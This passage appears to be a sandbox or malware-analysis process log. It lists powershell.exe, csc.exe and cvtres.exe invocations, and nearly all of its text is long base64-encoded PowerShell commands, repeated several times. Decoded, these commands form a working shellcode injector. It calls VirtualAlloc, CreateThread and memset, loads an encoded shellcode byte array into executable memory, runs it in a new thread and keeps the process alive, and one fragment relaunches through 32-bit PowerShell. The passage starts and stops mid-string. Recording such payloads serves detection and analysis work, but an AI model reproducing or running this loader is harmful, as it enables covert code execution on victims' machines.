QBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A
(PID: 3508)
-
powershell.exe
-ec JABLAEMAawBzACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQASwBDAGsAcwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAZABhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGEALAAwAHgAOABhACwAMAB4AGYAYwAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADUAOAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxADQALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAA5AGUALAAwAHgAMQBlACwAMAB4AGEAYwAsADAAeAA0AGYALAAwAHgANwA2ACwAMAB4ADUAYwAsADAAeAA0AGYALAAwAHgAYgAwACwAMAB4ADgANgAsADAAeAAwADEALAAwAHgAZAA5ACwAMAB4ADUANQAsADAAeABiADcALAAwAHgAMAAxACwAMAB4AGIAZAAsADAAeAAxAGUALAAwAHgAZQA3ACwAMAB4AGIAMQAsADAAeABiADUALAAwAHgANwAzACwAMAB4ADAAYgAsADAAeAAzADkALAAwAHgAOQBiACwAMAB4ADYANwAsADAAeAA5ADgALAAwAHgANABmACwAMAB4ADMANAAsADAAeAA4ADcALAAwAHgAMgA5ACwAMAB4AGUANQAsADAAeAA2ADIALAAwAHgAYQA2ACwAMAB4AGEAYQAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4AGEAOQAsADAAeAAyADgALAAwAHgAYQA1ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAMQAxACwAMAB4ADYANgAsADAAeABkAGUALAAwAHgANAA4ACwAMAB4ADUANgAsADAAeAA5AGIALAAwAHgAMQAzACwAMAB4ADEAOAAsADAAeAAwAGYALAAwAHgAZAA3ACwAMAB4ADgANgAsADAAeAA4AGQALAAwAHgAMgA0ACwAMAB4AGEAZAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADcANgAsADAAeAAyADMALAAwAHgAMQBiACwAMAB4AGQAYQAsADAAeABjAGUALAAwAHgANAAyACwAMAB4ADAAYQAsADAAeAA0AGQALAAwAHgANAA1ACwAMAB4ADEAZAAsADAAeAA4AGMALAAwAHgANgBmACwAMAB4ADgAYQAsADAAeAAxADUALAAwAHgAOAA1ACwAMAB4ADcANwAsADAAeABjAGYALAAwAHgAMQAwACwAMAB4ADUAZgAsADAAeAAwADMALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeAA1AGUALAAwAHgAYwA1ACwAMAB4ADcAMgAsADAAeAAwAGYALAAwAHgAYwBjACwAMAB4ADIAOAAsADAAeABiAGIALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA2AGMALAAwAHgANwBiACwAMAB4ADEAZAAsADAAeAA3AGIALAAwAHgAOAA0ACwAMAB4ADcAOAAsADAAeABhADAALAAwAHgANwBjACwAMAB4ADUAMwAsADAAeAAwADMALAAwAHgANwBlACwAMAB4ADAAOAAsADAAeAA0ADAALAAwAHgAYQAzACwAMAB4AGYANQAsADAAeABhAGEALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeABkADkALAAwAHgAMgBkACwAMAB4ADIANgAsADAAeAA1ADgALAAwAHgAOQA2ACwAMAB4ADMAYQAsADAAeAA2ADAALAAwAHgANwBjACwAMAB4ADIAOQAsADAAeABlAGUALAAwAHgAMQBhACwAMAB4ADcAOAAsADAAeABhADIALAAwAHgAMQAxACwAMAB4AGMAZAAsADAAeAAwADkALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABjADkALAAwAHgANQAyACwAMAB4AGEAMgAsADAAeAA1ADQALAAwAHgANAA4ACwAMAB4ADMAZQAsADAAeAAwADUALAAwAHgANgA4ACwAMAB4ADgAYQAsADAAeABlADEALAAwAHgAZgBhACwAMAB4AGMAYwAsADAAeABjADAALAAwAHgAMABmACwAMAB4AGUAZQAsADAAeAA3AGMALAAwAHgAOABiACwAMAB4ADQANwAsADAAeABjADMALAAwAHgANABjACwAMAB4ADMANAAsADAAeAA5ADcALAAwAHgANABiACwAMAB4AGMANgAsADAAeAA0ADcALAAwAHgAYQA1ACwAMAB4AGQANAAsADAAeAA3AGMALAAwAHgAYwAwACwAMAB4ADgANQAsADAAeAA5AGQALAAwAHgANQBhACwAMAB4ADEANwAsADAAeABlAGEALAAwAHgAYgA3ACwAMAB4ADEAYgAsADAAeAA4ADcALAAwAHgAMQA1ACwAMAB4ADMAOAAsADAAeAA1AGMALAAwAHgAOAAxACwAMAB4AGQAMQAsADAAeAA2AGMALAAwAHgAMABjACwAMAB4AGIAOQAsADAAeABmADAALAAwAHgAMABjACwAMAB4AGMANwAsADAAeAAzADkALAAwAHgAZgBkACwAMAB4AGQAOAAsADAAeAA3ADIALAAwAHgAMwAwACwAMAB4ADYAOQAsADAAeABiADgALAAwAHgAMgAyACwAMAB4AGQAYgAsADAAeAA1ADgALAAwAHgANQA2ACwAMAB4ADIAMQAsADAAeABlADQALAAwAHgAOABiACwAMAB4AGYAYQAsADAAeABhAGMALAAwAHgAMAAyACwAMAB4AGYAYgAsADAAeAA1ADIALAAwAHgAZgBmACwAMAB4ADkAYQAsADAAeABiAGIALAAwAHgAMAAyACwAMAB4AGIAZgAsADAAeAA0AGEALAAwAHgANQAzACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAYgA0ACwAMAB4ADQAMwAsADAAeAA3ADIALAAwAHgAOQBhACwAMAB4AGQAZAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADUALAAwAHgAOAA1ACwAMAB4ADAANAAsADAAeABkAGUALAAwAHgANABkACwAMAB4ADMANAAsADAAeABjADgALAAwAHgAZgA0ACwAMAB4ADIAYgAsADAAeAA3ADYALAAwAHgANAAyACwAMAB4AGYAYgAsADAAeABjAGMALAAwAHgAMwA4ACwAMAB4AGEAMwAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4AGEAYwAsADAAeAA0ADMALAAwAHgAYwBkACwAMAB4AGIAZAAsADAAeAA3AGEALAAwAHgANQBiACwAMAB4AGYAYgAsADAAeABhADgALAAwAHgAOAAyACwAMAB4AGMAOQAsADAAeAAwADAALAAwAHgANwBiACwAMAB4AGQANQAsADAAeAA2ADUALAAwAHgAMABiACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAMgBhACwAMAB4AGYANAAsADAAeAA4ADkALAAwAHgAMgBhACwAMAB4AGUAMwAsADAAeAA2ADAALAAwAHgANwAyACwAMAB4ADQANAAsADAAeAAwAGMALAAwAHgANgA1ACwAMAB4ADcAMgAsADAAeAA5ADQALAAwAHgANQBhACwAMAB4AGUAZgAsADAAeAA3ADIALAAwAHgAZgBjACwAMAB4ADMAYQAsADAAeAA0AGIALAAwAHgAMgAxACwAMAB4ADEAOQAsADAAeAA0ADUALAAwAHgANAA2ACwAMAB4ADUANQAsADAAeABiADIALAAwAHgAZAAwACwAMAB4ADYAOQAsADAAeAAwAGMALAAwAHgANgA3ACwAMAB4ADcAMgAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeABiADQALAAwAHgAOABkACwAMAB4ADQAZAAsADAAeABiADUALAAwAHgANAA0ACwAMAB4AGYAMQAsADAAeAA5AGIALAAwAHgAZgAzACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAMQA4ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABxAHIASQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAcQByAEkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHEAcgBJACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
(PID: 2444)
-
csc.exe
/noconfig /fullpaths @"%TEMP%\6ljpalv5.cmdline"
(PID: 2636)
- cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DE.tmp" "%TEMP%\CSCA6C9.tmp" (PID: 3780)
-
csc.exe
/noconfig /fullpaths @"%TEMP%\6ljpalv5.cmdline"
(PID: 2636)
-
powershell.exe
-ec JABLAEMAawBzACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQASwBDAGsAcwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAZABhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGEALAAwAHgAOABhACwAMAB4AGYAYwAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADUAOAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxADQALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAA5AGUALAAwAHgAMQBlACwAMAB4AGEAYwAsADAAeAA0AGYALAAwAHgANwA2ACwAMAB4ADUAYwAsADAAeAA0AGYALAAwAHgAYgAwACwAMAB4ADgANgAsADAAeAAwADEALAAwAHgAZAA5ACwAMAB4ADUANQAsADAAeABiADcALAAwAHgAMAAxACwAMAB4AGIAZAAsADAAeAAxAGUALAAwAHgAZQA3ACwAMAB4AGIAMQAsADAAeABiADUALAAwAHgANwAzACwAMAB4ADAAYgAsADAAeAAzADkALAAwAHgAOQBiACwAMAB4ADYANwAsADAAeAA5ADgALAAwAHgANABmACwAMAB4ADMANAAsADAAeAA4ADcALAAwAHgAMgA5ACwAMAB4AGUANQAsADAAeAA2ADIALAAwAHgAYQA2ACwAMAB4AGEAYQAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4AGEAOQAsADAAeAAyADgALAAwAHgAYQA1ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAMQAxACwAMAB4ADYANgAsADAAeABkAGUALAAwAHgANAA4ACwAMAB4ADUANgAsADAAeAA5AGIALAAwAHgAMQAzACwAMAB4ADEAOAAsADAAeAAwAGYALAAwAHgAZAA3ACwAMAB4ADgANgAsADAAeAA4AGQALAAwAHgAMgA0ACwAMAB4AGEAZAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADcANgAsADAAeAAyADMALAAwAHgAMQBiACwAMAB4AGQAYQAsADAAeABjAGUALAAwAHgANAAyACwAMAB4ADAAYQAsADAAeAA0AGQALAAwAHgANAA1ACwAMAB4ADEAZAAsADAAeAA4AGMALAAwAHgANgBmACwAMAB4ADgAYQAsADAAeAAxADUALAAwAHgAOAA1ACwAMAB4ADcANwAsADAAeABjAGYALAAwAHgAMQAwACwAMAB4ADUAZgAsADAAeAAwADMALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeAA1AGUALAAwAHgAYwA1ACwAMAB4ADcAMgAsADAAeAAwAGYALAAwAHgAYwBjACwAMAB4ADIAOAAsADAAeABiAGIALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA2AGMALAAwAHgANwBiACwAMAB4ADEAZAAsADAAeAA3AGIALAAwAHgAOAA0ACwAMAB4ADcAOAAsADAAeABhADAALAAwAHgANwBjACwAMAB4ADUAMwAsADAAeAAwADMALAAwAHgANwBlACwAMAB4ADAAOAAsADAAeAA0ADAALAAwAHgAYQAzACwAMAB4AGYANQAsADAAeABhAGEALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeABkADkALAAwAHgAMgBkACwAMAB4ADIANgAsADAAeAA1ADgALAAwAHgAOQA2ACwAMAB4ADMAYQAsADAAeAA2ADAALAAwAHgANwBjACwAMAB4ADIAOQAsADAAeABlAGUALAAwAHgAMQBhACwAMAB4ADcAOAAsADAAeABhADIALAAwAHgAMQAxACwAMAB4AGMAZAAsADAAeAAwADkALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABjADkALAAwAHgANQAyACwAMAB4AGEAMgAsADAAeAA1ADQALAAwAHgANAA4ACwAMAB4ADMAZQAsADAAeAAwADUALAAwAHgANgA4ACwAMAB4ADgAYQAsADAAeABlADEALAAwAHgAZgBhACwAMAB4AGMAYwAsADAAeABjADAALAAwAHgAMABmACwAMAB4AGUAZQAsADAAeAA3AGMALAAwAHgAOABiACwAMAB4ADQANwAsADAAeABjADMALAAwAHgANABjACwAMAB4ADMANAAsADAAeAA5ADcALAAwAHgANABiACwAMAB4AGMANgAsADAAeAA0ADcALAAwAHgAYQA1ACwAMAB4AGQANAAsADAAeAA3AGMALAAwAHgAYwAwACwAMAB4ADgANQAsADAAeAA5AGQALAAwAHgANQBhACwAMAB4ADEANwAsADAAeABlAGEALAAwAHgAYgA3ACwAMAB4ADEAYgAsADAAeAA4ADcALAAwAHgAMQA1ACwAMAB4ADMAOAAsADAAeAA1AGMALAAwAHgAOAAxACwAMAB4AGQAMQAsADAAeAA2AGMALAAwAHgAMABjACwAMAB4AGIAOQAsADAAeABmADAALAAwAHgAMABjACwAMAB4AGMANwAsADAAeAAzADkALAAwAHgAZgBkACwAMAB4AGQAOAAsADAAeAA3ADIALAAwAHgAMwAwACwAMAB4ADYAOQAsADAAeABiADgALAAwAHgAMgAyACwAMAB4AGQAYgAsADAAeAA1ADgALAAwAHgANQA2ACwAMAB4ADIAMQAsADAAeABlADQALAAwAHgAOABiACwAMAB4AGYAYQAsADAAeABhAGMALAAwAHgAMAAyACwAMAB4AGYAYgAsADAAeAA1ADIALAAwAHgAZgBmACwAMAB4ADkAYQAsADAAeABiAGIALAAwAHgAMAAyACwAMAB4AGIAZgAsADAAeAA0AGEALAAwAHgANQAzACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAYgA0ACwAMAB4ADQAMwAsADAAeAA3ADIALAAwAHgAOQBhACwAMAB4AGQAZAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADUALAAwAHgAOAA1ACwAMAB4ADAANAAsADAAeABkAGUALAAwAHgANABkACwAMAB4ADMANAAsADAAeABjADgALAAwAHgAZgA0ACwAMAB4ADIAYgAsADAAeAA3ADYALAAwAHgANAAyACwAMAB4AGYAYgAsADAAeABjAGMALAAwAHgAMwA4ACwAMAB4AGEAMwAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4AGEAYwAsADAAeAA0ADMALAAwAHgAYwBkACwAMAB4AGIAZAAsADAAeAA3AGEALAAwAHgANQBiACwAMAB4AGYAYgAsADAAeABhADgALAAwAHgAOAAyACwAMAB4AGMAOQAsADAAeAAwADAALAAwAHgANwBiACwAMAB4AGQANQAsADAAeAA2ADUALAAwAHgAMABiACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAMgBhACwAMAB4AGYANAAsADAAeAA4ADkALAAwAHgAMgBhACwAMAB4AGUAMwAsADAAeAA2ADAALAAwAHgANwAyACwAMAB4ADQANAAsADAAeAAwAGMALAAwAHgANgA1ACwAMAB4ADcAMgAsADAAeAA5ADQALAAwAHgANQBhACwAMAB4AGUAZgAsADAAeAA3ADIALAAwAHgAZgBjACwAMAB4ADMAYQAsADAAeAA0AGIALAAwAHgAMgAxACwAMAB4ADEAOQAsADAAeAA0ADUALAAwAHgANAA2ACwAMAB4ADUANQAsADAAeABiADIALAAwAHgAZAAwACwAMAB4ADYAOQAsADAAeAAwAGMALAAwAHgANgA3ACwAMAB4ADcAMgAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeABiADQALAAwAHgAOABkACwAMAB4ADQAZAAsADAAeABiADUALAAwAHgANAA0ACwAMAB4AGYAMQAsADAAeAA5AGIALAAwAHgAZgAzACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAMQA4ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABxAHIASQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAcQByAEkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHEAcgBJACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
(PID: 2444)
-
powershell.exe
-ec JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQA1ACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAA